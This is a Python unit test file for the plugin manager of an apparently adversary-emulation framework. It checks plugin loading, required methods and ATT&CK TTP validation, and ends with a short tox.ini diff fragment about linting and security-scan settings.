from plugins.base.sensor import SensorPlugin
from plugins.base.attack import AttackPlugin
from plugins.base.vulnerability_plugin import VulnerabilityPlugin
from plugins.base.machinery import MachineryPlugin
# https://docs.python.org/3/library/unittest.html
class TestMachineControl(unittest.TestCase):
def setUp(self) -> None:
self.attack_logger = AttackLog(0)
def test_basic_pluginmanager_init(self):
""" just a simple init """
p = PluginManager(self.attack_logger)
self.assertIsNotNone(p)
def test_basic_pluginmanager_get_plugins_empty(self):
""" just a simple getting plugins with empty directory """
p = PluginManager(self.attack_logger, "tests/plugins/none")
self.assertEqual(p.get_plugins(AttackPlugin), [])
def test_basic_pluginmanager_get_caldera_plugin(self):
""" just a simple getting the one caldera plugin """
p = PluginManager(self.attack_logger, "tests/plugins/caldera/caldera_ok.py")
plugins = p.get_plugins(AttackPlugin)
self.assertEqual(plugins[0].name, "caldera_autostart_1")
self.assertEqual(len(plugins), 1)
def test_basic_pluginmanager_count_caldera_plugin(self):
""" counting caldera requirements """
p = PluginManager(self.attack_logger, "tests/plugins/caldera/caldera_ok.py")
plugins = p.count_caldera_requirements(AttackPlugin, None)
self.assertEqual(plugins, 1)
def test_basic_pluginmanager_count_metasploit_plugin(self):
""" counting caldera requirements """
p = PluginManager(self.attack_logger, "tests/plugins/caldera/caldera_ok.py")
plugins = p.count_metasploit_requirements(AttackPlugin, None)
self.assertEqual(plugins, 0)
def test_basic_pluginmanager_count_metasploit_plugin_2(self):
""" counting metasploit requirements """
p = PluginManager(self.attack_logger, "tests/plugins/metasploit/metasploit_ok.py")
plugins = p.count_metasploit_requirements(AttackPlugin, None)
self.assertEqual(plugins, 1)
def test_basic_pluginmanager_check_ok(self):
""" basic check for a plugin, ok """
p = PluginManager(self.attack_logger, "tests/plugins/metasploit/metasploit_ok.py")
plugins = p.get_plugins(AttackPlugin)
c = p.check(plugins[0])
self.assertEqual(c, [])
def test_basic_pluginmanager_check_sensor_plugin_ok(self):
""" just a simple getting the one sensor plugin """
p = PluginManager(self.attack_logger, "tests/plugins/sensor/sensor_ok/*.py")
plugins = p.get_plugins(SensorPlugin)
c = p.check(plugins[0])
self.assertEqual(c, [])
def test_basic_pluginmanager_check_sensor_plugin_missing_collect(self):
""" a sensor plugin with missing collect should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/sensor/missing_collect/*.py")
plugins = p.get_plugins(SensorPlugin)
c = p.check(plugins[0])
self.assertRegex(c[0], "Method 'collect' not implemented in missing_collect in .*")
def test_basic_pluginmanager_pick_sensor_plugin_by_name(self):
""" get a plugin by name """
p = PluginManager(self.attack_logger, "tests/plugins/sensor/two_sensors/*/*.py")
plugins = p.get_plugins(SensorPlugin, ["pick_me"])
self.assertEqual(len(plugins), 1)
self.assertEqual(plugins[0].get_name(), "pick_me")
def test_basic_pluginmanager_pick_sensor_plugin_by_name_2(self):
""" get two plugins by name """
p = PluginManager(self.attack_logger, "tests/plugins/sensor/two_sensors/*/*.py")
plugins = p.get_plugins(SensorPlugin, ["pick_me", "ignore_me"])
self.assertEqual(len(plugins), 2)
def test_basic_pluginmanager_pick_sensor_plugin_by_name_3(self):
""" not finding any plugin by name """
p = PluginManager(self.attack_logger, "tests/plugins/sensor/two_sensors/*/*.py")
plugins = p.get_plugins(SensorPlugin, ["fail"])
self.assertEqual(len(plugins), 0)
def test_basic_pluginmanager_check_attack_plugin_missing_run(self):
""" a attack plugin with missing run should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/attack/missing_run/*.py")
plugins = p.get_plugins(AttackPlugin)
c = p.check(plugins[0])
self.assertRegex(c[0], "Method 'run' not implemented in missing_run in .*")
def test_basic_pluginmanager_check_vulnerability_plugin_ok(self):
""" a vulnerability plugin ok on check"""
p = PluginManager(self.attack_logger, "tests/plugins/vulnerabilities/ok/*.py")
plugins = p.get_plugins(VulnerabilityPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 0)
def test_basic_pluginmanager_check_vulnerability_plugin_missing_start(self):
""" a vulnerability plugin with missing start should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/vulnerabilities/no_start/*.py")
plugins = p.get_plugins(VulnerabilityPlugin)
c = p.check(plugins[0])
self.assertRegex(c[0], "Method 'start' not implemented in missing_start in .*")
def test_basic_pluginmanager_check_vulnerability_plugin_missing_stop(self):
""" a vulnerability plugin with missing stop should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/vulnerabilities/no_stop/*.py")
plugins = p.get_plugins(VulnerabilityPlugin)
c = p.check(plugins[0])
self.assertRegex(c[0], "Method 'stop' not implemented in missing_stop in .*")
def test_basic_pluginmanager_check_machinery_plugin_ok(self):
""" a machinery plugin ok on check"""
p = PluginManager(self.attack_logger, "tests/plugins/machinery/ok/*.py")
plugins = p.get_plugins(MachineryPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 0)
def test_basic_pluginmanager_check_machinery_plugin_missing_up(self):
""" a machinery plugin with missing up should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_up/*.py")
plugins = p.get_plugins(MachineryPlugin)
c = p.check(plugins[0])
self.assertRegex(c[0], "Method 'up' not implemented in machinery_no_up in .*")
def test_basic_pluginmanager_check_machinery_plugin_missing_state(self):
""" a machinery plugin with missing get_state should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_state/*.py")
plugins = p.get_plugins(MachineryPlugin)
c = p.check(plugins[0])
self.assertRegex(c[0], "Method 'get_state' not implemented in machinery_no_state in .*")
def test_basic_pluginmanager_check_machinery_plugin_missing_ip(self):
""" a machinery plugin with missing get_ip should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_ip/*.py")
plugins = p.get_plugins(MachineryPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Method 'get_ip' not implemented in machinery_no_ip in .*")
def test_basic_pluginmanager_check_machinery_plugin_missing_halt(self):
""" a machinery plugin with missing halt should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_halt/*.py")
plugins = p.get_plugins(MachineryPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Method 'halt' not implemented in machinery_no_halt in .*")
def test_basic_pluginmanager_check_machinery_plugin_missing_destroyt(self):
""" a machinery plugin with missing destroy should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_destroy/*.py")
plugins = p.get_plugins(MachineryPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Method 'destroy' not implemented in machinery_no_destroy in .*")
def test_basic_pluginmanager_check_machinery_plugin_missing_create(self):
""" a machinery plugin with missing create should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_create/*.py")
plugins = p.get_plugins(MachineryPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Method 'create' not implemented in machinery_no_create in .*")
def test_basic_pluginmanager_check_basics_plugin_missing_description(self):
""" a plugin with missing description should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/basics/no_description/*.py")
plugins = p.get_plugins(AttackPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "No description in plugin: metasploit_no_description in .*")
def test_basic_pluginmanager_check_basics_plugin_missing_name(self):
""" a plugin with missing name should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/basics/no_name/*.py")
plugins = p.get_plugins(AttackPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "No name for plugin: in .*")
def test_basic_pluginmanager_check_vul_plugin_missing_ttp(self):
""" a vulnerability plugin with missing name should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
plugins = p.get_plugins(VulnerabilityPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Vulnerability plugins need a valid ttp number \\(either T1234, T1234.222 or ...\\) vulnerability_ok uses None in .*")
def test_basic_pluginmanager_check_ttp_is_none(self):
""" ttp check with NONE"""
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong(None), True)
def test_basic_pluginmanager_check_ttp_is_short_ttp(self):
""" ttp check with T1234 """
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong("T1234"), False)
def test_basic_pluginmanager_check_ttp_is_detailed_ttp(self):
""" ttp check with T1234.123 """
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong("T1234.123"), False)
def test_basic_pluginmanager_check_ttp_is_unknown_ttp(self):
""" ttp check with ??? """
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong("???"), False)
def test_basic_pluginmanager_check_ttp_is_multiple(self):
""" ttp check with ??? """
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong("multiple"), False)
def test_basic_pluginmanager_check_ttp_is_wrong_ttp(self):
""" ttp check with something else """
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong("this is not gonna work"), True)
def test_basic_pluginmanager_check_attack_plugin_missing_ttp(self):
""" a attack plugin with missing name should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/basics/attack_no_ttp/*.py")
plugins = p.get_plugins(AttackPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Attack plugins need a valid ttp number \\(either T1234, T1234.222 or ...\\) no TTP uses None in .*")

@ -30,7 +30,7 @@ exclude =
max-complexity = 10
[testenv]
deps = -rrequirements.txt
deps = -r requirements.txt
flake8
safety
bandit
@ -44,7 +44,8 @@ commands =
# Ignoring:
# C901 complex code. Reduce complexitiy. But this thing is over-reacting
# E501: line too long. Please: Still keep it short. But 80 chars is just incredibly short nowadays
flake8 --ignore C901,E501
# W601: TODO: has_key in config_verifier.py should be replaced by an iterator
flake8 --ignore C901,E501,W601
# Check if dependencies are vulnerable
safety check -r requirements.txt
# Check for common vulnerabilities

Loading…
Cancel
Save